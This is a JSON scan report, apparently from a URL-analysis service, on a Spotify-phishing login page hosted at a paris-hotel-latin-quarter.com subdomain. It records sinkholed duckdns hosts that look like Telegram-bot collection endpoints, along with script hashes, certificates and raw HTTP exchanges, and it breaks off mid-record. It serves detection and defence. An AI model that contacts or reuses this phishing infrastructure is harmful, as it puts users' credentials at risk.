{"report_id":"a132afad-ec3c-42b8-abcf-9966e870c6a3","version":6,"status":"done","tags":["spotify","phishing","music","dyndns"],"date":"2026-02-23T12:39:57Z","url":{"schema":"http","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"104.21.94.172","port":0,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"final":{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"title":"Welcome","dom":{"size":12126,"mime_type":"text/html; charset=utf-8","magic":"HTML document, ASCII text, with very long lines (5282)","md5":"0dcf9566079a9420cfe5369e7cfd6ed0","sha1":"84cd254418aeedc5e36f7c58cca062a57bebecc3","sha256":"66b45aad9cf9bf60197232d0c6e03293446b9f96d1fc5f588018dbdea1799ba6","sha512":"7269548a4515ae4db4a077b4a54d6e4187fc79661aea2e9b3f2e669f0dd608c71d6bfa316505282b3fc3931ea23207df6a5d21a6253eb5c8ad373cc261e21dca","ssdeep":"192:5nRwgJZfmMUBrrUmt+aEZXutwrqvqBhEAiQFuep73BpCCZGpbZm9r3FaAq0umpeI:5HE1LGthfp3","tlshash":"05423923f3f02264882484809aa7b3bd3d7d582573419e75da85bf7e2788ce76f34658","dom_hash":"domhashc28d40b46221fd0c935028422bfc98b5","first_seen":"","last_seen":"","times_seen":0,"resource_available":false,"data":null}},"submit":{"url":{"schema":"http","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"104.21.94.172","port":0,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"tags":null,"meta":null},"settings":{"access":"public","device_type":"desktop","expires_at":"2027-03-30T12:39:57Z","useragent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0","referer":"","cookies":null,"exit_node":"z0yflva4pidy47h"},"stats":{"alert_count":{"ids":0,"urlquery":3,"analyzer":4}},"detection":{"ids":null,"analyzer":[{"sensor_name":"ultradns","sensor_type":"DNS","title":"DigiCert UltraDNS","description":"DigiCert UltraDNS","scan_date":"2026-02-23","alert":"Sinkholed","trigger":"telegrambotcheck.duckdns.org","verdict":"malicious","severity":"medium","comment":"","link":"https://vercara.digicert.com/ultra-dns-public","meta":null},{"sensor_name":"opendns","sensor_type":"DNS","title":"OpenDNS","description":"OpenDNS","scan_date":"2026-02-23","alert":"Phishing Block","trigger":"telegrambotcheck.duckdns.org","verdict":"phishing","severity":"medium","comment":"","link":"https://www.opendns.com/","meta":null},{"sensor_name":"dns4eu","sensor_type":"DNS","title":"DNS4EU","description":"DNS4EU","scan_date":"2026-02-23","alert":"Sinkholed","trigger":"telegrambotcheck.duckdns.org","verdict":"malicious","severity":"medium","comment":"","link":"https://www.joindns4.eu/","meta":null},{"sensor_name":"ultradns","sensor_type":"DNS","title":"DigiCert UltraDNS","description":"DigiCert UltraDNS","scan_date":"2026-02-23","alert":"Sinkholed","trigger":"chacktgbot.duckdns.org","verdict":"malicious","severity":"medium","comment":"","link":"https://vercara.digicert.com/ultra-dns-public","meta":null}],"urlquery":[{"sensor_name":"urlquery","alert":"Phishing - Spotify","verdict":"phishing","severity":"medium","comment":"Asset commenly seen with Spotify phishing","tags":["spotify","phishing","music"],"meta":null},{"sensor_name":"urlquery","alert":"Suspicious - DynDNS domain","verdict":"suspicious","severity":"low","comment":"","tags":["dyndns"],"meta":null},{"sensor_name":"urlquery","alert":"Suspicious - DynDNS domain","verdict":"suspicious","severity":"low","comment":"","tags":["dyndns"],"meta":null}]},"summary":[{"fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"domain_registered":"2025-03-22","domain_rank":0,"first_seen":"2026-02-23T01:34:06.221211Z","last_seen":"2026-02-23T01:34:06.221211Z","alert_count":5,"request_count":9,"received_data":506663,"sent_data":4870,"comment":"","tags":null,"fingerprints":[{"name":"PHP:8.2.30","description":"PHP is a general-purpose scripting language used for web development.","website":"https://php.net","common_platform_enumeration":"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*","icon":"PHP.svg","categories":["Programming languages"]},{"name":"jQuery:3.7.1","description":"jQuery is a JavaScript library which is a free, open-source software designed to simplify HTML DOM tree traversal and manipulation, as well as event handling, CSS animation, and Ajax.","website":"https://jquery.com","common_platform_enumeration":"cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*","icon":"jQuery.svg","categories":["JavaScript libraries"]},{"name":"cdnjs","description":"cdnjs is a free distributed JS library delivery service.","website":"https://cdnjs.com","common_platform_enumeration":"","icon":"cdnjs.svg","categories":["CDN"]},{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]},{"name":"Plesk","description":"Plesk is a web hosting and server data centre automation software with a control panel developed for Linux and Windows-based retail hosting service providers.","website":"https://www.plesk.com","common_platform_enumeration":"cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*","icon":"Plesk.svg","categories":["Hosting panels"]}]},{"fqdn":"cdnjs.cloudflare.com","ip":{"addr":"104.17.25.14","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"domain_registered":"2009-02-17","domain_rank":1222,"first_seen":"2012-05-23T12:49:49Z","last_seen":"2026-02-22T22:27:51.54973Z","alert_count":0,"request_count":1,"received_data":88552,"sent_data":491,"comment":"","tags":null,"fingerprints":[{"name":"HSTS","description":"HTTP Strict Transport Security (HSTS) informs browsers that the site should only be accessed using HTTPS.","website":"https://www.rfc-editor.org/rfc/rfc6797#section-6.1","common_platform_enumeration":"","icon":"","categories":["Security"]},{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}]},{"fqdn":"telegrambotcheck.duckdns.org","ip":{"addr":"0.0.0.0","port":0,"asn":0,"as":"","country":"","country_code":"zz"},"domain_registered":"2013-04-12","domain_rank":0,"first_seen":"2024-05-03T19:21:27Z","last_seen":"2026-02-18T03:46:18.607755Z","alert_count":4,"request_count":1,"received_data":0,"sent_data":640,"comment":"","tags":null,"fingerprints":null},{"fqdn":"chacktgbot.duckdns.org","ip":{"addr":"102.165.14.26","port":7001,"asn":397423,"as":"TIER-NET","country":"United States","country_code":"US"},"domain_registered":"2013-04-12","domain_rank":0,"first_seen":"2024-11-27T12:04:49.171033Z","last_seen":"2026-02-18T14:45:35.720843Z","alert_count":3,"request_count":1,"received_data":107,"sent_data":634,"comment":"","tags":null,"fingerprints":[{"name":"Python:3.12.6","description":"Python is an interpreted and general-purpose programming language.","website":"https://python.org","common_platform_enumeration":"cpe:2.3:a:python:python:*:*:*:*:*:*:*:*","icon":"Python.png","categories":["Programming languages"]}]}],"files":null,"artifacts":{"windows_shortcuts":null,"files":null,"telegram":null,"pdfs":null,"clipboard":null},"sensors":{"ids":null,"analyzer":null,"urlquery":[{"sensor_name":"urlquery","alert":"Phishing - Spotify","verdict":"phishing","severity":"medium","comment":"Asset commenly seen with Spotify phishing","tags":["spotify","phishing","music"],"meta":null},{"sensor_name":"urlquery","alert":"Suspicious - DynDNS domain","verdict":"suspicious","severity":"low","comment":"","tags":["dyndns"],"meta":null}]},"javascript":{"script":[{"url":{"schema":"https","addr":"cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js","fqdn":"cdnjs.cloudflare.com","domain":"cloudflare.com","tld":"com"},"ip":{"addr":"104.17.25.14","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"scriptElement","is_inline":false,"md5":"2c872dbe60f4ba70fb85356113d8b35e","sha1":"ee48592d1fff952fcf06ce0b666ed4785493afdc","sha256":"fc9a93dd241f6b045cbff0481cf4e1901becd0e12fb45166a8f17f95823f0b1a","sha512":"bf6089ed4698cb8270a8b0c8ad9508ff886a7a842278e98064d5c1790ca3a36d5d69d9f047ef196882554fc104da2c88eb5395f1ee8cf0f3f6ff8869408350fe","ssdeep":"1536:0RUX9uDgwxcy2KVBNwchN6SLaHEk2BSrBESp+a/IEk4aAocVi8SMBQ47GKr:sHNwcv9VBQpLl88SMBQ47GKr","tlshash":"3983f8df77ca702247ab30b9006f550bf276199d684d4400f159d8e9bcb8a4a827bf7e","size":87533,"data":"","first_seen":"2023-08-31T16:03:19Z","last_seen":"2026-05-26T05:19:31.098252Z","times_seen":161177,"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"Function","is_inline":false,"md5":"8d8cde2701eda39c8439de90d9affc6b","sha1":"7b1a69adeb19caf27dda703e7c77c0b548703008","sha256":"1c6318b6b5d2b60f2ad35ef47fb82144a92c0bfb92a989fa239fa4bd30d88829","sha512":"089e10bdead68f2b78b01a122bb56944c217e8b8adec3856e959ed027927bcfbb3ffbd932dbf1431b95e0b0b59671cf6c45748d349d44595a1e8e579df0148e8","ssdeep":"","tlshash":"b1415340243f336ce3a36492149f4841f45a3fe3b107ec8dd1439d692a7114a7b6bcab","size":2115,"data":"","first_seen":"2025-12-04T15:37:04.7687Z","last_seen":"2026-05-08T01:17:07.281435Z","times_seen":21,"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/res/cdn/jq.js","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"scriptElement","is_inline":false,"md5":"ccf212eddc3506318c557182e8297ac6","sha1":"83cbb4c131ec92ddb4b4ac004a692ab5de57e22b","sha256":"7f8c83527958acc94204177932f4af82490579bc49a8410feda8fba5e8947815","sha512":"87ebad74c1e2b547c989593bf3cfa0c5ed905c10d0a599b7251ab948a2be061fbb076c623ff4135bc50a9e562d07619910213f1fe037548942962a59eadb1763","ssdeep":"6144:VpkhNVlJ+TC1lFhTzeKpTcYmD2zK8U1Js3Px+WK+N7TFyygRWL/IaLgeNTIPfgy8:kjTcYmD4I4Px+WK+N7TFyjeTiPf7Aqqt","tlshash":"1284f8d8f78d212e433231aa982f11ceb77dd175550444aafd4d987c28a482d83bbf7a","size":386150,"data":"","first_seen":"2025-01-29T01:32:25.483201Z","last_seen":"2026-05-25T15:06:05.610255Z","times_seen":707,"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"scriptElement","is_inline":true,"md5":"ddf8df1938d6ae383760dd95c41f92e5","sha1":"58f368d093107f0d4f3167360e95dd86417c3bae","sha256":"f492e90f34a83361a3b6fb4116db9e070bbffa04e2459c499418bda4dbdfc263","sha512":"940cdf7df55a73df276dc9daeb41f21f95a8db4aa10b844dc9710e713fd4a3b667ea634fb3951b11fb989138d50ef4769aa3bda1ff3bd158340c80663e75ffbd","ssdeep":"","tlshash":"75a022830880a0c080300000282cc0f8cc00000bca0b82c2020300c82cc8082f30a800","size":59,"data":"","first_seen":"2026-02-23T01:34:10.617902Z","last_seen":"2026-02-23T23:52:20.904286Z","times_seen":6,"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"scriptElement","is_inline":true,"md5":"6a5f8b2d5f27b63d4cdb0b920879652a","sha1":"b3eb31c12727f79c141a1115dac68a0e451aa1ee","sha256":"05cb3f3b48ef1a431f0f75092c14920a4943ea651084f854c0f98211bfd2fcc0","sha512":"50343457922ef733d94a576e04165faef34c669d80e2b0945c91100aeda5528907f13bc74b3c05d2ed1e81f69d9ce91b0e2b73ccc329757256f0dee2324a3c8d","ssdeep":"","tlshash":"1ff052c8a1f2268002bb60250daf85253951028b051c88007c1e9ae16fc8e86bdf26a1","size":545,"data":"","first_seen":"2024-09-28T08:05:35.670848Z","last_seen":"2026-05-15T00:54:24.333179Z","times_seen":426,"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/res/jquery.js","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"scriptElement","is_inline":false,"md5":"fe615139ccfacd72791e537b6e9501ad","sha1":"ccb030e60ed991ad34609730763b2ca647a7cd2d","sha256":"af05ada543cc97d37d14d55fef0274cc9a4eaffd33b97484c29c49e31aabfb1b","sha512":"94426585509f0f756d2357435904a7215f09b44e7fc716aab966fb8b92334039a2cd40d4f9d2fa6e27ebad79ddb576fe0bcd471917a8df3611382e512e1df9c1","ssdeep":"","tlshash":"b4511994a1135ef6619ac0805d2f5f0e83d4bfb09c8ac4f6ed29ec2569cd0f4a41129c","size":2981,"data":"","first_seen":"2025-12-04T15:37:04.756389Z","last_seen":"2026-05-08T01:17:07.27635Z","times_seen":21,"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"introduction_type":"Function","is_inline":false,"md5":"1c6a6c71380985120d01bea144185ba4","sha1":"3e481ef5f3695a6ac6bd1cf3af9e65a12d26f217","sha256":"ccaec75c9d55cd2d0a562d60fe103554ad8fe243769b918b996abda27c6011d6","sha512":"33a7b92adac173e4bdad97c6cca83a96e3cf0f52a97b72ccf1942622f20fa4f99c91bf32d725764bfeaeb52ae066893f3fd2b56a9bbbd5ffcb07dd9745d4ddfb","ssdeep":"","tlshash":"dc11cc6a19990eec8fe116c21cbf57864cba9f204e8de0644713fc43cae4bc241acf20","size":916,"data":"","first_seen":"2025-12-04T15:37:04.771528Z","last_seen":"2026-05-08T01:17:07.280875Z","times_seen":21,"alerts":{"ids":null,"analyzer":null,"urlquery":null}}],"eval":null,"write":null,"console":null},"http":[{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":true,"resource_type":"document","requested_by":"","date":"2026-02-23T12:39:41.131Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"paris-hotel-latin-quarter.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Sat, 31 Jan 2026 00:36:16 GMT","end":"Fri, 01 May 2026 01:36:03 GMT"},"fingerprint":{"sha1":"96:AC:96:09:F6:BF:E6:ED:4A:AE:25:2D:29:39:1B:63:6A:ED:03:0F","sha256":"D5:A4:6C:C1:41:F9:5F:80:49:B4:ED:B4:96:85:55:45:9F:83:A4:BF:92:53:BB:B3:60:4E:72:57:2A:02:77:4A"}}},"request":{"raw":"GET /auth/login.php HTTP/1.1\r\nHost: 0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/2 200 OK\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: text/html; charset=UTF-8\r\nserver: cloudflare\r\nx-powered-by: PHP/8.2.30, PleskLin\r\nvary: Accept-Encoding\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=Nhg%2Fj8TrIVAEw08wISiKh4uSmHGUNmpxkUlJ89lMXvr0Z%2FRi7bqQ%2FvKJIb%2FHrpQpV63M%2Bi2%2FfS3QNs7Tb6O7yBR7Q67RsUbQP5wVSagjKNwsy2IVtrRTYuD5LYnS9lkTW3ppYY0uUIr4iu43woatItHHbyMXbOqwEgMKV1k%3D\"}]}\r\ncf-cache-status: DYNAMIC\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\ncontent-encoding: br\r\ncf-ray: 9d26c9921f69902d-ARN\r\nalt-svc: h3=\":443\"; ma=86400\r\nX-Firefox-Spdy: h2\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"PHP:8.2.30","description":"PHP is a general-purpose scripting language used for web development.","website":"https://php.net","common_platform_enumeration":"cpe:2.3:a:php:php:*:*:*:*:*:*:*:*","icon":"PHP.svg","categories":["Programming languages"]},{"name":"jQuery:3.7.1","description":"jQuery is a JavaScript library which is a free, open-source software designed to simplify HTML DOM tree traversal and manipulation, as well as event handling, CSS animation, and Ajax.","website":"https://jquery.com","common_platform_enumeration":"cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:*","icon":"jQuery.svg","categories":["JavaScript libraries"]},{"name":"cdnjs","description":"cdnjs is a free distributed JS library delivery service.","website":"https://cdnjs.com","common_platform_enumeration":"","icon":"cdnjs.svg","categories":["CDN"]},{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":12256,"size_decoded":0,"mime_type":"text/html; charset=UTF-8","magic":"HTML document, ASCII text, with very long lines (5282), with CRLF line terminators","md5":"438961ce3fd274aadc558c204efc33e1","sha1":"30322945d989c490092155804ac9e74236d6ca9d","sha256":"b4d5c2d8726686da0ef119f4b396b7ccd1106196ac8d73470d732b3dcaf221ac","sha512":"0eb834ce32bf6badc287f68ecab4c8b06b0d488de6d475046a4535e123fc05a3165abac77053908a38db539f920e3e7d8ddf3fe6edc50d8647e5e0fd9f0b0438","ssdeep":"192:p2uUCwwgJZfmMUBrrUmt+aEZXutwrqvqBPy9vFuep73BpCCZGpbZm9r3FaAq0um4:AuA62nsY","tlshash":"8f425c23f3f02664882484809ea7b3bd7d3d582533419e75a985bf7e2788ce76f34658","first_seen":"2026-02-23T12:40:00.829881Z","last_seen":"2026-02-23T12:40:00.829881Z","times_seen":1,"resource_available":false,"data":null}},"time_used":49,"timings":{"blocked":0,"dns":0,"connect":0,"send":0,"wait":49,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":null,"urlquery":null}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/res/app.css","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"stylesheet","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.457Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"paris-hotel-latin-quarter.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Sat, 31 Jan 2026 00:36:16 GMT","end":"Fri, 01 May 2026 01:36:03 GMT"},"fingerprint":{"sha1":"96:AC:96:09:F6:BF:E6:ED:4A:AE:25:2D:29:39:1B:63:6A:ED:03:0F","sha256":"D5:A4:6C:C1:41:F9:5F:80:49:B4:ED:B4:96:85:55:45:9F:83:A4:BF:92:53:BB:B3:60:4E:72:57:2A:02:77:4A"}}},"request":{"raw":"GET /auth/res/app.css HTTP/1.1\r\nHost: 0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: text/css,*/*;q=0.1\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php\r\nSec-Fetch-Dest: style\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: text/css\r\nserver: cloudflare\r\nlast-modified: Sat, 23 Aug 2025 05:38:28 GMT\r\netag: W/\"68a953d4-7a5\"\r\nx-powered-by: PleskLin\r\ncontent-encoding: br\r\nage: 1047\r\ncache-control: max-age=14400\r\ncf-cache-status: HIT\r\nvary: accept-encoding\r\npriority: u=2,i=?0\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=SoxSoKOOStln3MX4J5SZmyk0ZxBi9HwGUqxVSqdwtguKQQCkBXiauyJupasUyLYFftbtbwmSTSL%2Fndh%2BVsVcoJALZGl1WxfgpF1YAwPYhpIn6JkwgXnv6T52tpkeGFrTYRJsAsNHR9UbfgpcijUNtghu4ZfvZzzpPTaAqzs%3D\"}]}\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\ncf-ray: 9d26c9941fde562f-ARN\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Plesk","description":"Plesk is a web hosting and server data centre automation software with a control panel developed for Linux and Windows-based retail hosting service providers.","website":"https://www.plesk.com","common_platform_enumeration":"cpe:2.3:a:parallels:parallels_plesk_panel:*:*:*:*:*:*:*:*","icon":"Plesk.svg","categories":["Hosting panels"]},{"name":"Cloudflare","description":"Cloudflare is a web-infrastructure and website-security company, providing content-delivery-network services, DDoS mitigation, Internet security, and distributed domain-name-server services.","website":"https://www.cloudflare.com","common_platform_enumeration":"","icon":"CloudFlare.svg","categories":["CDN"]}],"data":{"size":1957,"size_decoded":0,"mime_type":"text/css","magic":"ASCII text, with CRLF line terminators","md5":"44e9fc098f947ed0ec275d8d34e9d6e7","sha1":"52298ab66b9f836ca56f2486ffc4b9a3e177066b","sha256":"3502b2792583b9d0a20110ce7a4f38b3e74325c0ebe191d73f7b78f527c1d28c","sha512":"70b43bfe307e55660f4defa721930edc36bbc5df1fda242c878f75e5e9af638487081bce3dcc9603593ef030cba25d9fa5848995c108706b363e0eb541612412","ssdeep":"","tlshash":"b941ef79c602250a7236dd54af720698ea8c401b8e0b9669bfdc73a5cff15768270f8c","first_seen":"2024-12-23T12:05:45.442551Z","last_seen":"2026-05-15T00:54:24.325686Z","times_seen":330,"resource_available":false,"data":null}},"time_used":19,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":19,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":null,"urlquery":[{"sensor_name":"urlquery","alert":"Phishing - Spotify","verdict":"phishing","severity":"medium","comment":"Asset commenly seen with Spotify phishing","tags":["spotify","phishing","music"],"meta":null}]}},{"url":{"schema":"https","addr":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/res/loading.gif","fqdn":"0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com","domain":"paris-hotel-latin-quarter.com","tld":"com"},"ip":{"addr":"188.114.96.1","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"img","requested_by":"https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php","date":"2026-02-23T12:39:41.460Z","timestamp":0,"http_version":"","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"paris-hotel-latin-quarter.com","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Sat, 31 Jan 2026 00:36:16 GMT","end":"Fri, 01 May 2026 01:36:03 GMT"},"fingerprint":{"sha1":"96:AC:96:09:F6:BF:E6:ED:4A:AE:25:2D:29:39:1B:63:6A:ED:03:0F","sha256":"D5:A4:6C:C1:41:F9:5F:80:49:B4:ED:B4:96:85:55:45:9F:83:A4:BF:92:53:BB:B3:60:4E:72:57:2A:02:77:4A"}}},"request":{"raw":"GET /auth/res/loading.gif HTTP/1.1\r\nHost: 0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: image/avif,image/webp,*/*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://0ab565e91b860448b7e019fa26494e9.paris-hotel-latin-quarter.com/auth/login.php\r\nSec-Fetch-Dest: image\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Mon, 23 Feb 2026 12:39:41 GMT\r\ncontent-type: image/gif\r\ncontent-length: 79790\r\nserver: cloudflare\r\nlast-modified: Sat, 23 Aug 2025 05:38:28 GMT\r\netag: \"68a953d4-137ae\"\r\nx-powered-by: PleskLin\r\naccept-ranges: bytes\r\nage: 1047\r\ncache-control: max-age=14400\r\ncf-cache-status: HIT\r\npriority: u=4,i=?0\r\nreport-to: {\"group\":\"cf-nel\",\"max_age\":604800,\"endpoints\":[{\"url\":\"https://a.nel.cloudflare.com/report/v4?s=kwVeF%2F%2FOpIj7K0SpnlcnLJzAyMURVDAcaZXAaY4Ir3UY57ZEnwU%2FD3VbhDWDgVwVh%2FD2bDNliQ6us3YYwjJ1%2BNQotqZTlDfKtyVK1O7AFn9zN8lGY4PjQHKpUxYp7I3ZeJxXRhs0N84JaqPndbV7MqbLV1azK%2FBeC3c0s5Q%3D\"}]}\r\nnel: {\"report_to\":\"cf-nel\",\"success_fraction\":0.0,\"max_age\":604800}\r\ncf-ray: 9d26c9941fe7562f-ARN\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfExtPri\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":[{"name":"Plesk","description":"Plesk is a web hosting and server data centre automation software with a control panel developed for Linux and Windows-based retail hosting service 